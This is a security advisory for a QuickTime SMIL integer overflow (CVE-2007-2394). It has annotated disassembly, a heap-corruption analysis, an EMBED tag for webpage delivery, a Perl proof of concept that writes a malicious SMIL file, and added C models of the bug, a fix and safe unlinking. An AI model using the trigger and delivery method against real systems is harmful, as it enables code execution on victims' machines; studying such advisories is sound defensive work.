======================================================================
Apple QuickTime integer overflow vulnerability when parsing SMIL file
======================================================================

Date:       09/03/2007
Author:     David Vaartjes
Identifier: CVE-2007-2394
Revision:   0.2

----------------------------------------------------------------------
AFFECTED VERSIONS
----------------------------------------------------------------------

Researched on QuickTime 7.1.3 running on Windows 2000 SP4. iDefense
confirmed the existence of this vulnerability in versions 7.1.3 and
7.1.5 for Windows XP SP2 and Mac OS X as well [1]. As the QuickTime
binaries for Windows XP and Vista are identical, this issue also
affects QuickTime running on Windows Vista.

----------------------------------------------------------------------
FIXED VERSIONS
----------------------------------------------------------------------

Apple has released QuickTime version 7.2 for Mac OS X v10.3.9, Mac OS X
v10.4.9 or later, Windows Vista and Windows XP SP2 to address this
issue. See [2] for additional information about this update.

QuickTime 7.2 is not available for the Windows 2000 platform.
Presumably, Apple dropped support for this platform.

----------------------------------------------------------------------
PRODUCT DESCRIPTION
----------------------------------------------------------------------

QuickTime is Apple's media player product. According to Apple,
QuickTime is downloaded over 10 million times a month. According to
Secunia, QuickTime is currently installed on over 50% of PCs [3].

The Synchronized Multimedia Integration Language (SMIL) provides a
high-level scripting syntax for describing multimedia presentations.
SMIL files are text files that use XML-based syntax to specify which
media elements to present and where and when to present them.
----------------------------------------------------------------------
VULNERABILITY DESCRIPTION
----------------------------------------------------------------------

An integer overflow vulnerability exists in a part of QuickTime.qts that
calculates the size of a buffer that stores the title and author fields
of a SMIL file. This can be exploited to overflow that heap buffer with
user supplied content, which eventually can result in the execution of
arbitrary code.

----------------------------------------------------------------------
VULNERABILITY DETAILS
----------------------------------------------------------------------

The integer overflow can be triggered by creating a SMIL file
containing a title and author field of a specific length.

When such a SMIL file is parsed, the length value of the author field
is stored in a short int data type (16 bit) without bounds checking.
In sub_66952B50(), this value is sign extended to a long int data type
(32 bit):

--
66952C9A      push    eax
66952C9B      call    sub_668B57D0
66952CA0 -->  movsx   eax, word ptr [esp+2Ch+var_C]
66952CA5      mov     edx, [esp+2Ch+arg_4]
66952CA9      lea     ecx, [esp+2Ch+var_10]
--

So, when the length of the author field is >= 0x8000 bytes, it will be
extended to a length value between 0xffff8000 and 0xffffffff.

Next, in sub_668DCFD0() the sign extended length of the author field is
added to the length of the title field + 0x20:

--
668DD04D      jnz     short loc_668DD0A0
668DD04F      test    ebx, ebx
668DD051      jz      loc_668DD1EB
668DD057 -->  lea     eax, [edi+ebx]    // edi holds the length of
                                        // the title field + 0x20.
                                        // ebx holds the sign
                                        // extended length of the
                                        // author field.
668DD05A      push    eax
668DD05B      push    ecx
--

In sub_668DCA60(), 4 is added to the result of the calculation:

--
668DCB37      test    edi, edi
668DCB39      jz      short loc_668DCB40
668DCB3B -->  lea     eax, [edi+4]      // edi holds the result
668DCB3E      jmp     short loc_668DCB42
--

Next, in sub_668F5550() the final length value is used as the dwBytes
argument in a call to HeapReAlloc():

--
668F555E      push    eax               // dwBytes (user specified)
668F555F      push    ecx               // lpMem
668F5560      push    1                 // dwFlags
668F5562      push    edx               // hHeap
668F5563 -->  call    ds:HeapReAlloc
--

This allows for the allocation of a controlled amount of memory. For
example, when setting the length of the author field to 0xff00 (65280)
and the length of the title field to 0xdf (223), the following
situation occurs:

1: sub_66952B50(): 0x0000ff00 will be sign extended to 0xffffff00.
2: sub_668DCFD0(): 0x000000ff (0x000000df + 0x00000020) will be added
   to 0xffffff00, resulting in a length value of 0xffffffff.
3: sub_668DCA60(): 0x00000004 is added to 0xffffffff, resulting in a
   value of 0x00000003 (the addition wraps around 32 bits).
4: sub_668F5550(): HeapReAlloc() will allocate 0x00000003 bytes of
   memory.

Next, the pointer returned by HeapReAlloc() is used by sub_668DCFD0() as
the dest argument in a call to memcpy():

--
668DD08E      push    ebx               // count, length value right
                                        // after sign extension
                                        // (0xffffff00).
668DD08F      push    edx               // src, buffer with user
                                        // supplied (author) content.
668DD090      add     eax, esi
668DD092 -->  push    eax               // dest, 3 byte buffer.
668DD093      call    _memcpy
668DD098      add     esp, 18h
668DD09B      jmp     loc_668DD1E5
--

Note that the count passed to memcpy() is the sign extended author
length itself (0xffffff00), not the wrapped allocation size, so the copy
runs far beyond both the 3 byte destination and the actual author data.
This copy action will result in an overflow of the 3 byte heap buffer
with data from the author field (user supplied). Due to the large
amount of data written, this will eventually result in an access
violation when memory is read or written outside the heap page. The
exception is handled by the program and execution continues with a
corrupt heap.
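The size computation above, reproduced in C as an added example (not code from this advisory or from QuickTime): vuln_alloc_size() follows the four steps with 32-bit wrapping arithmetic, vuln_copy_count() returns the count that is pushed for memcpy(), and safe_alloc_size() is one hardened form that zero extends instead of sign extends, bounds each field and checks every addition for wrap-around before the result reaches the allocator. The function names and the MAX_FIELD_LEN limit are assumptions of this example.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Constants from the disassembly: sub_668DCFD0() adds 0x20 to the title
 * length, sub_668DCA60() adds 4 to the sum. */
#define TITLE_EXTRA 0x20u
#define TRAILER     4u

/* Upper bound per field for the hardened variant. The value is an
 * assumption for this example, not a limit QuickTime enforces. */
#define MAX_FIELD_LEN 0x1000u

/* movsx: sign extend a 16-bit length into a 32-bit register, written
 * without relying on implementation-defined signed casts. */
static int32_t movsx16(uint16_t v)
{
    return (v & 0x8000u) ? (int32_t)v - 0x10000 : (int32_t)v;
}

/* Vulnerable size computation, step for step as in the advisory:
 *   sub_66952B50: ebx = movsx(author_len)
 *   sub_668DCFD0: eax = (title_len + 0x20) + ebx
 *   sub_668DCA60: eax = eax + 4          -> dwBytes for HeapReAlloc()
 * All 32-bit additions wrap silently. */
uint32_t vuln_alloc_size(uint16_t title_len, uint16_t author_len)
{
    uint32_t ebx = (uint32_t)movsx16(author_len);
    uint32_t edi = (uint32_t)title_len + TITLE_EXTRA;
    uint32_t eax = edi + ebx;
    return eax + TRAILER;
}

/* The count later pushed for memcpy() is ebx itself, the sign extended
 * author length, not the (wrapped) allocation size. */
uint32_t vuln_copy_count(uint16_t author_len)
{
    return (uint32_t)movsx16(author_len);
}

/* Hardened variant: zero extend (movzx), bound each field, and reject
 * any sum that would wrap. The wrap checks cannot fire under the bound
 * above; they stay so the function remains correct if the bound is
 * raised. */
bool safe_alloc_size(uint32_t title_len, uint32_t author_len, uint32_t *out)
{
    if (title_len > MAX_FIELD_LEN || author_len > MAX_FIELD_LEN)
        return false;

    uint32_t total = title_len;
    if (UINT32_MAX - total < TITLE_EXTRA) return false;
    total += TITLE_EXTRA;
    if (UINT32_MAX - total < author_len) return false;
    total += author_len;
    if (UINT32_MAX - total < TRAILER) return false;
    total += TRAILER;

    *out = total;
    return true;
}

int main(void)
{
    uint16_t title = 0xdf, author = 0xff00;   /* lengths from the advisory */
    uint32_t safe;

    printf("vulnerable dwBytes : 0x%08x\n", vuln_alloc_size(title, author));
    printf("memcpy count       : 0x%08x\n", vuln_copy_count(author));
    if (safe_alloc_size(title, author, &safe))
        printf("hardened dwBytes   : 0x%08x\n", safe);
    else
        printf("hardened           : rejected\n");
    return 0;
}
```

With the advisory's lengths the vulnerable path yields dwBytes 0x00000003 and a memcpy() count of 0xffffff00, while the hardened variant rejects the input outright because the author field exceeds the bound; ordinary lengths such as a 10 byte title and a 100 byte author pass and produce 146.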
For my platform (win2k), when a call to HeapAlloc() is executed the
unlink code of ntdll will "fail" because we have overwritten pointers
in the heap management structures of other heap buffers with our data.
The status of the registers during unlinking is:

--
EAX 78787878   <-- user supplied
ECX 78787878   <-- user supplied
EDX 012DF6F0   ASCII "xxxxxxxxxxx <-> xxxxxxxxxxxx"
EBX 00000078
ESP 0012EDC8
EBP 0012EF84
ESI 01200000
EDI 012DF6F0   ASCII "xxxxxxxxxxx <-> xxxxxxxxxxxx"
--

--
77f867e6      mov     dword ptr ds:[ecx],eax
77f867e8      mov     dword ptr ds:[eax+4],ecx
--

The unlink instructions will result in the following exception:

---------------------------
QuickTimePlayerMain: QuickTimePlayer.exe
---------------------------
The instruction at "0x77f867e6" referenced memory at "0x78787878". The
memory could not be "written".
---------------------------

This shows that we are able to overwrite 4 bytes anywhere in the
address space of the process with "any" 4 byte value we want (eax is
the value, ecx the address, both taken from our data), which can for
example be exploited to overwrite function pointers like the SEH or UEF
to gain control of the process.

This 4 byte overwrite via the unlink code does not apply to XP SP2 and
W2K3, as "safe unlinking" is used on these platforms.

----------------------------------------------------------------------
ATTACK VECTORS
----------------------------------------------------------------------

This vulnerability can be triggered by luring a target user into
opening a malicious SMIL file locally or via a webpage. In the latter
scenario the OBJECT (IE) and/or EMBED (Firefox) tags can be used; the
QTSRC attribute points the QuickTime plugin at the SMIL file while SRC
names a benign QuickTime image:

<EMBED SRC="available-sample.qtif" QTSRC="poc.smil" WIDTH="10"
       HEIGHT="10" PLUGINSPAGE="www.apple.com/quicktime/download"
       TYPE="video/quicktime" />

----------------------------------------------------------------------
PROOF OF CONCEPT
----------------------------------------------------------------------

#!/usr/bin/perl -w
####
# QuickTime SMIL integer overflow vulnerability (CVE-2007-2394) POC
#
# Researched on QuickTime 7.1.3 on Windows 2000 SP4.
#
# David Vaartjes
####
use strict;

my $file    = "poc.smil";
my $padd    = "x";
my $cop_len = 36;

####
# By choosing the following lengths the
# integer overflow will be triggered.
####
my $tit_len  = 223;
my $auth_len = 65280;

open(FH, ">$file") or die "Can't open file: $!";

# Element names below are assumed: QuickTime reads the title, author
# and copyright fields from <meta> elements in the SMIL head. Each
# field is padded with $padd to the chosen length.
print FH "<smil>\n".
         "<head>\n".
         "  <meta name=\"title\" content=\"" . ($padd x $tit_len) . "\" />\n".
         "  <meta name=\"author\" content=\"" . ($padd x $auth_len) . "\" />\n".
         "  <meta name=\"copyright\" content=\"" . ($padd x $cop_len) . "\" />\n".
         "</head>\n".
         "</smil>";
close(FH);

----------------------------------------------------------------------
REFERENCES
----------------------------------------------------------------------

[1] http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=556
[2] http://docs.info.apple.com/article.html?artnum=305947
[3] http://secunia.com/blog/7/

----------------------------------------------------------------------
DISCLOSURE TIMELINE
----------------------------------------------------------------------

04/02/2007  Initial vendor notification (by iDefense)
04/09/2007  Initial vendor response
07/11/2007  Apple security bulletin & patches available
07/11/2007  Public disclosure of iDefense advisory
09/03/2007  Public disclosure of this advisory
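The Windows 2000 unlink write described under VULNERABILITY DETAILS, modelled in C as an added example that is not part of this advisory: unlink_unchecked() performs the two stores from the ntdll listing, unlink_checked() adds the back-pointer validation that the "safe unlinking" of XP SP2 and W2K3 performs, and demo_write_what_where() shows how a corrupted entry turns the first store into an arbitrary 4 byte write. The list layout, function names and the stand-in "where"/"what" targets are assumptions of the example; the targets are kept writable so the demo completes instead of faulting the way the real crash did.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>

/* Doubly linked list entry as used by the heap free lists: a forward
 * and a back link, each one pointer wide. On 32-bit Windows 2000 the
 * back link sits at offset 4, which is the [eax+4] in the advisory. */
typedef struct list_entry {
    struct list_entry *flink;
    struct list_entry *blink;
} list_entry_t;

/* Unchecked unlink, the Windows 2000 behaviour:
 *   mov dword ptr [ecx], eax    ; blink->flink = flink
 *   mov dword ptr [eax+4], ecx  ; flink->blink = blink
 * When both links were written by the overflow, the first store puts an
 * attacker chosen value (flink) at an attacker chosen address (blink). */
void unlink_unchecked(list_entry_t *e)
{
    list_entry_t *f = e->flink;
    list_entry_t *b = e->blink;
    b->flink = f;
    f->blink = b;
}

/* Safe unlinking as introduced with XP SP2 / Server 2003: refuse unless
 * both neighbours still point back at the entry being removed. */
bool unlink_checked(list_entry_t *e)
{
    if (e->flink->blink != e || e->blink->flink != e)
        return false;
    e->blink->flink = e->flink;
    e->flink->blink = e->blink;
    return true;
}

/* Intact circular list a <-> b <-> c (and back to a): the checked
 * unlink removes b and leaves a and c linked to each other. */
bool demo_legit_unlink(void)
{
    list_entry_t a, b, c;
    a.flink = &b; b.blink = &a;
    b.flink = &c; c.blink = &b;
    c.flink = &a; a.blink = &c;
    if (!unlink_checked(&b))
        return false;
    return a.flink == &c && c.blink == &a;
}

/* Corrupted entry: flink and blink carry values that the overflowing
 * author field wrote. 'where' stands in for a function pointer slot
 * (SEH/UEF in the advisory) and 'what' for the value the attacker wants
 * stored there; both are constructed for this example. Returns true
 * when the unchecked unlink performed the write and the checked unlink
 * refused to. */
bool demo_write_what_where(void)
{
    list_entry_t where = { NULL, NULL };
    list_entry_t what  = { NULL, NULL };
    list_entry_t corrupted = { &what, &where };

    /* Neither neighbour points back at 'corrupted', so the check trips. */
    bool refused = !unlink_checked(&corrupted);

    /* Without the check: *where = what, the 4 byte write-what-where. */
    unlink_unchecked(&corrupted);
    bool overwritten = (where.flink == &what);

    return refused && overwritten;
}

int main(void)
{
    printf("legitimate unlink ok        : %s\n", demo_legit_unlink() ? "yes" : "no");
    printf("write-what-where vs. check  : %s\n", demo_write_what_where() ? "yes" : "no");
    return 0;
}
```

In the real crash eax and ecx both held 0x78787878, so the first store faulted on an unmapped address; with a mapped target such as an exception handler slot, the same store silently installs the attacker's pointer, which is exactly what the back-pointer check rejects.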